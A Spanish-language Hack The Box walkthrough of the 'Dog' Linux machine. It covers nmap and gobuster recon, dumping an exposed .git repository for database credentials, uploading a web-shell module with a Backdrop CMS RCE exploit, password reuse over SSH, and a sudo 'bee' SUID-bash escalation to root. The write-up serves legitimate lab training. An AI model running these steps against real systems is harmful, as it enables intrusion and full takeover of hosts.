Dog

Sobre esta maquina: HTB

Sistema Operativo: Linux

Skills Usados:

• Python

• Hashcrack

Realizamos el primer reocnocimiento:

nmap -p- --open -sS -T4 -Pn -n 10.10.11.58 -oN First_Scan Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-20 18:23 EDT Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 98.91% done; ETC: 18:24 (0:00:00 remaining) Nmap scan report for 10.10.11.58 Host is up (0.14s latency). Not shown: 64130 closed tcp ports (reset), 1403 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 80/tcp open http

Hacemos escaneo de servicios y Scripts:

nmap -p80,22 -sVC -T4 -Pn -n 10.10.11.58 -oN SV_Scann Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-20 18:27 EDT Nmap scan report for 10.10.11.58 Host is up (0.54s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA) | 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA) |_ 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |http-generator: Backdrop CMS 1 (https://backdropcms.org) |http-server-header: Apache/2.4.41 (Ubuntu) | http-robots.txt: 22 disallowed entries (15 shown) | /core/ /profiles/ /README.md /web.config /admin | /comment/reply /filter/tips /node/add /search /user/register |/user/password /user/login /user/logout /?q=admin /?q=comment/reply | http-git: | 10.10.11.58:80/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file 'description' to name the... | Last commit message: todo: customize url aliases. reference:https://docs.backdro... |_http-title: Home | Dog Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Aplicamos scripts especificos en el puerto 80:

nmap --script "vuln and safe" -p80 10.10.11.58 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-20 19:32 EDT Nmap scan report for 10.10.11.58 Host is up (0.14s latency). PORT STATE SERVICE 80/tcp open http | http-git: | 10.10.11.58:80/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file 'description' to name the... |_ Last commit message: todo: customize url aliases. reference:https://docs.backdro...

Enumeramos subdominios:

gobuster dir -u "http://10.10.11.58/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) [+] Url: http://10.10.11.58/ [+] Method: GET [+] Threads: 20 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s Starting gobuster in directory enumeration mode /files (Status: 301) [Size: 310] [--> http://10.10.11.58/files/] /themes (Status: 301) [Size: 311] [--> http://10.10.11.58/themes/] /modules (Status: 301) [Size: 312] [--> http://10.10.11.58/modules/] /sites (Status: 301) [Size: 310] [--> http://10.10.11.58/sites/] /core (Status: 301) [Size: 309] [--> http://10.10.11.58/core/] /layouts (Status: 301) [Size: 312] [--> http://10.10.11.58/layouts/]

Revisamos que corre por el puerto 80:

(captura)

Conseguimos un /.git dentro de el encontramos un logs/head dentro de el conseguimos lo siguiente:

0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root dog@dog.htb 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases

No logramos utilizarlo para ingresar por ssh pero utilizaremos git-dumper para descargar el repositorio:

git-dumper http://10.10.11.58/.git/ /tmp/repo

Lo clonamos y dentro del repositorio conseguimos settings.php que nos da credenciales para una database:

15 │ $database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop'; 16 │ $database_prefix = '';

Intentamos acceder con las credenciales root y el password de settings.php pero no conseguimos nada, asi que buscamos otros usuarios en el repositorio:

grep -r dog.htb .git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root dog@dog.htb 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases .git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root dog@dog.htb 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json: "tiffany@dog.htb"

Probamos con tiffany:

(captura)

Estamos dentro:

(captura)

Una vez autenticados buscamos exploits para este CMS y encontramos: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE) en exploits database, lo copiamos a nuestra maquina e intentamos ejecutarlo:

ls 52021.py

Para ejecutarlo debemos enviar el archivo creado en formato comprimido al objetivo:

python3 52021.py http://10.10.11.58 Backdrop CMS 1.27.1 - Remote Command Execution Exploit Evil module generating... Evil module generated! shell.zip Go to http://10.10.11.58/admin/modules/install and upload the shell.zip for Manual Installation. Your shell address: http://10.10.11.58/modules/shell/shell.php ls shell  52021.py  shell.zip tar -cvf shell.tar shell/ shell/ shell/shell.info shell/shell.php

Una vez comprimido lo subimos de manera manual en /admin/modules/install:

(captura)

Se a subido, correctamente, ahora probaremos si podemos ejecutar comandos:

(captura)

listamos la listas de usuarios:

cat /etc/passwd | grep bash root❌0:0:root:/root:/bin/bash jobert❌1000:1000:jobert:/home/jobert:/bin/bash johncusack❌1001:1001:,,,:/home/johncusack:/bin/bash

Con estos usuarios intentaremos ingresar por ssh y probar si hay reutilizacion de passwords:

ssh johncusack@10.10.11.58 johncusack@10.10.11.58's password: Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64)

Documentation: https://help.ubuntu.com

Management: https://landscape.canonical.com

Support: https://ubuntu.com/pro System information as of Wed 21 May 2025 12:41:13 AM UTC System load: 0.0 Usage of /: 47.8% of 6.32GB Memory usage: 20% Swap usage: 0% Processes: 229 Users logged in: 0 IPv4 address for eth0: 10.10.11.58 IPv6 address for eth0: dead:beef::250:56ff:feb0:d2b9 johncusack@dog:~$

Estamos dentro, buscamos la primera flag:

johncusack@dog:$ ls user.txt johncusack@dog:$ cat user.txt d33e09644b94da0fba0c26d028d02006

Buscamos ahora escalar privilegios y conseguir la ultima flag:

johncusack@dog:~$ sudo -l Matching Defaults entries for johncusack on dog: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin User johncusack may run the following commands on dog: (ALL : ALL) /usr/local/bin/bee Podemos ejecutar bin/bee asi que buscaremos un exploit para este recurso en particular:

Consegui este comando: sudo /usr/local/bin/bee ev "system('cp /bin/bash /tmp/bash && chmod +s /tmp/bash')" que basicamente ejecuta el binario bee e incluye mediante php en el sistema una bash como root en el directorio temporal /tmp para ejecutarlo de mejor manera es recomendado hacerlo desde var/www/html de la siguiente manera:

johncusack@dog:~$ cd /var/www/html johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee ev "system('cp /bin/bash /tmp/bash && chmod +s /tmp/bash')" johncusack@dog:/var/www/html$ /tmp/bash -p bash-5.0# whoami root

Ya como root buscamos la ultima flag:

ash-5.0# cd /root bash-5.0# ls root.txt bash-5.0# cat root.txt 629e91f760683659d1e6239a53412ebd

Una vez capturada la flag de root damos esta maquina como terminada.